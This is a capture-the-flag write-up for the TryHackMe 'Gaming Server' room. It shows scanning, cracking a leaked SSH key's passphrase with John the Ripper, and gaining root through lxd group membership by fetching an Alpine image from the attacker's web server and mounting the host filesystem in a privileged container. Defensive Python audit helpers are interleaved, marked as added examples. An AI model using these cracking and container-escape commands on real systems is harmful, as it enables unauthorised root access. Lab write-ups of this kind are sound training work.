Gaming Server
Date: 11 November, 2021
Author: Dhaval Kotak
Room: Gaming Server
Port Scanning
nanomite @ zeus in ~/thm/gaming_server
⚡️ nmap 10.10.19.112 | tee nmap.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-11 22:21 IST
Nmap scan report for 10.10.19.112
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 9.16 seconds
Gobuster Scanning
nanomite @ zeus in ~/thm/gaming_server
⚡️ gobuster dir -u http://10.10.19.112 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.19.112
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/11 22:22:38 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 2762]
/robots.txt (Status: 200) [Size: 33]
/secret (Status: 301) [Size: 313] [--> http://10.10.19.112/secret/]
/server-status (Status: 403) [Size: 277]
/uploads (Status: 301) [Size: 314] [--> http://10.10.19.112/uploads/]
===============================================================
2021/11/11 22:24:36 Finished
===============================================================
Getting SSH Credentials
Username
We find the username john in the page source.
RSA Key
There is an RSA private key in the secret directory that gobuster discovered.
We can run ssh2john on it and then John the Ripper itself to recover the key's passphrase, which we need for the SSH login.
nanomite @ zeus in ~/thm/gaming_server
⚡️ python /opt/john/ssh2John.py id_rsa > hash
nanomite @ zeus in ~/thm/gaming_server
⚡️ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
letmein (id_rsa)
1g 0:00:00:06 71.47% (ETA: 22:29:46) 0.1658g/s 1697Kp/s 1697Kc/s 1697KC/s alfaris
Session aborted
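The John output above explains why this took six seconds: cost 0 means the key is a legacy PEM file encrypted with a single MD5 iteration (MD5/AES), so every guess is cheap. The hypothetical Python helper below is an added audit example, not from the writeup; it parses only the header of an SSH private key and reports how it is protected, so weakly protected keys in a key inventory can be found and re-encrypted. All key blobs it checks are constructed inline and carry no real key material.

```python
import base64
import struct

# Hypothetical audit helper (added example, not from the writeup): parse only the header
# of an SSH private key and report how it is protected. Legacy PEM keys (what John shows as
# cost 0 = MD5/AES with 1 iteration) crack quickly; OpenSSH-format keys with bcrypt do not.
def _sshstr(buf, off):  # one SSH wire-format string: uint32 big-endian length + bytes
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n

def classify_key(pem_text):
    """Return (format, cipher, kdf, rounds) for a PEM-encoded private key."""
    lines = [ln.strip() for ln in pem_text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        assert blob.startswith(b"openssh-key-v1\x00"), "not an openssh-key-v1 blob"
        cipher, off = _sshstr(blob, 15)          # skip the 15-byte magic string
        kdf, off = _sshstr(blob, off)
        kdfopts, _ = _sshstr(blob, off)
        rounds = 0
        if kdf == b"bcrypt":                     # kdfoptions = string salt + uint32 rounds
            _salt, o = _sshstr(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return "openssh", cipher.decode(), kdf.decode(), rounds
    # Legacy PEM: a DEK-Info header means encrypted, with one MD5 iteration whatever the cipher.
    for ln in lines[1:]:
        if ln.startswith("DEK-Info:"):
            return "pem", ln.split(":", 1)[1].split(",")[0].strip(), "md5", 1
    return "pem", "none", "none", 0

def assess(pem_text):  # severity line for a key inventory report
    fmt, cipher, kdf, rounds = classify_key(pem_text)
    if cipher == "none":
        return "HIGH: private key is not encrypted"
    if fmt == "pem":
        return f"HIGH: legacy PEM key ({cipher}), MD5 KDF with 1 iteration"
    if kdf == "bcrypt" and rounds >= 16:
        return f"OK: OpenSSH key, {cipher}, bcrypt rounds={rounds}"
    return f"MEDIUM: OpenSSH key, {cipher}, {kdf} rounds={rounds}"

def sample_openssh_key(cipher, kdf, rounds):  # constructed openssh-key-v1 header, no key material
    s = lambda b: struct.pack(">I", len(b)) + b
    opts = s(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    blob = b"openssh-key-v1\x00" + s(cipher) + s(kdf) + s(opts) + struct.pack(">I", 1)
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n%s\n-----END OPENSSH PRIVATE KEY-----\n" % base64.b64encode(blob).decode()

# Constructed legacy PEM header (body omitted) in the form the old ssh-keygen wrote.
SAMPLE_LEGACY_ENCRYPTED = ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\nAAAA\n-----END RSA PRIVATE KEY-----\n")
```

Keys flagged HIGH can be re-encrypted in place with `ssh-keygen -p -o -a 100 -f id_rsa`, which moves them to the OpenSSH format with a bcrypt KDF and 100 rounds.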
SSH Login
Now we can log in as john with the key and the passphrase we recovered.
The user.txt flag is right there in the home directory.
nanomite @ zeus in ~/thm/gaming_server
⚡️ ssh john@10.10.19.112 -i id_rsa
The authenticity of host '10.10.19.112 (10.10.19.112)' can't be established.
ECDSA key fingerprint is SHA256:LO5bYqjXqLnB39jxUzFMiOaZ1YnyFGGXUmf1edL6R9o.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.19.112' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-76-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Nov 11 17:05:39 UTC 2021
System load: 0.0 Processes: 97
Usage of /: 41.1% of 9.78GB Users logged in: 0
Memory usage: 32% IP address for eth0: 10.10.19.112
Swap usage: 0%
0 packages can be updated.
0 updates are security updates.
Last login: Mon Jul 27 20:17:26 2020 from 10.8.5.10
john@exploitable:~$ ls
user.txt
john@exploitable:~$ cat user.txt
a5c2ff8b9c(REDACTED)ff2f1a5a6e7e
What is the user flag?
a5c2ff8b9c(REDACTED)ff2f1a5a6e7e
Privilege Escalation
Our user is a member of the lxd group. LXD manages Linux containers, and a member of that group can create a privileged container with the host's root filesystem mounted inside it, which amounts to root access on the host.
john@exploitable:~$ id
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
We can build an Alpine Linux image on our local machine with lxd-alpine-builder and then import it into LXD on the target.
First clone the repository on your machine and then run the build script as root to produce the image as a tar file.
nanomite @ zeus in ~/thm/gaming_server
⚡️ git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 42, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 42 (delta 5), reused 4 (delta 1), pack-reused 27
Receiving objects: 100% (42/42), 3.11 MiB | 650.00 KiB/s, done.
Resolving deltas: 100% (11/11), done.
nanomite @ zeus in ~/thm/gaming_server
⚡️ cd lxd-alpine-builder
nanomite @ zeus in ~/thm/gaming_server/lxd-alpine-builder on master
⚡️ sudo ./build-alpine
Now start a web server on the attacker machine and fetch the image on the target:
// Your Machine
nanomite @ zeus in ~/thm/gaming_server/lxd-alpine-builder on master*
⚡️ python3 -m http.server 5000
Serving HTTP on 0.0.0.0 port 5000 (http://0.0.0.0:5000/) ...
// Target Machine
john@exploitable:~$ wget 10.17.14.25:5000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Now import the image:
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
Then spawn the root shell by running the following commands:
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
After that the host's root filesystem is available under /mnt/root inside the container, so we can find the root flag and read it.
What is the root flag?
2e337b8c9f(REDACTED)8d4e6a7c88fc
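The lxd group membership above is the whole finding: LXD lets any member start a privileged container with / mounted, so that group is root-equivalent and worth inventorying on every host. The hypothetical Python audit below is an added example, not part of the writeup; it parses /etc/passwd and /etc/group text (constructed samples are embedded) and lists every user in such a group, including users whose primary group is lxd, which a grep of /etc/group alone would miss.

```python
# Hypothetical audit script (added example, not part of the writeup): list local users whose
# group membership is effectively root-equivalent, such as john's lxd membership above; any
# lxd member can launch a privileged container with the host's / mounted, as shown in the room.
# It parses /etc/passwd and /etc/group text; constructed samples are embedded at the bottom.
HIGH_RISK_GROUPS = {
    "lxd": "can start a privileged LXD container with the host filesystem mounted",
    "docker": "can start a privileged Docker container with the host filesystem mounted",
    "sudo": "can run commands as root via sudo",
}

def parse_passwd(text):
    """Map username -> primary gid from /etc/passwd lines."""
    users = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            name, _pw, _uid, gid, *_rest = line.split(":")
            users[name] = int(gid)
    return users

def parse_group(text):
    """Map group name -> (gid, set of explicitly listed members) from /etc/group lines."""
    groups = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            name, _pw, gid, members = line.split(":")
            groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups

def risky_memberships(passwd_text, group_text):
    """Sorted (user, group) pairs for every membership in a HIGH_RISK_GROUPS group.
    Users whose primary gid is the group never appear in /etc/group's member list,
    so /etc/passwd is consulted too; a grep of /etc/group alone would miss them."""
    users, groups = parse_passwd(passwd_text), parse_group(group_text)
    hits = set()
    for gname, (gid, members) in groups.items():
        if gname in HIGH_RISK_GROUPS:
            hits.update((u, gname) for u in members)
            hits.update((u, gname) for u, pgid in users.items() if pgid == gid)
    return sorted(hits)

# Constructed samples mirroring the id output above (john: uid 1000, groups adm, sudo, lxd),
# plus a second account whose primary group is lxd and so is invisible in /etc/group.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:john:/home/john:/bin/bash
builder:x:1001:108:builder:/home/builder:/bin/bash
"""
SAMPLE_GROUP = """root:x:0:
adm:x:4:john
sudo:x:27:john
lxd:x:108:john
"""
```

On a real host call `risky_memberships(open("/etc/passwd").read(), open("/etc/group").read())` and review every pair it returns; nobody needs lxd membership for day-to-day use.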